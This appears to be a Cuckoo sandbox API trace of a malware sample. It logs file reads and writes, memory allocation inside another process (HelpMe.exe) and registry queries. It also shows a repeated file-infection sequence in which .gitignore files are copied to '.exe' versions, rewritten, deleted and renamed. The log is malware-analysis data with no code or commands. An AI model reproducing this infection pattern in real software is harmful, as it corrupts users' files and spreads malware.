"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->12288"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->12288"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\ornnwr.dll"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\ornnwr.dll.exe","lpNewFileName->C:\cuckoo\dll\ornnwr.dll"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\files\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001f0","lpValueName->CommonVideo"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->ProfilesDirectory"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->AllUsersProfile"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->CommonVideo","dwType->1","lpData->C:\Documents and Settings\All Users\Documents\My Videos","cbData->112"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f4","hKey->0x000001f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f4","lpValueName->Generation"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToWrite->719"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f6","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f2","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f2","lpValueName->DriveMask"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f2","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f2","lpValueName->DriveMask"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->71"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->71"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\files\.gitignore"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\files\.gitignore.exe","lpNewFileName->C:\cuckoo\files\.gitignore"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\logs\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
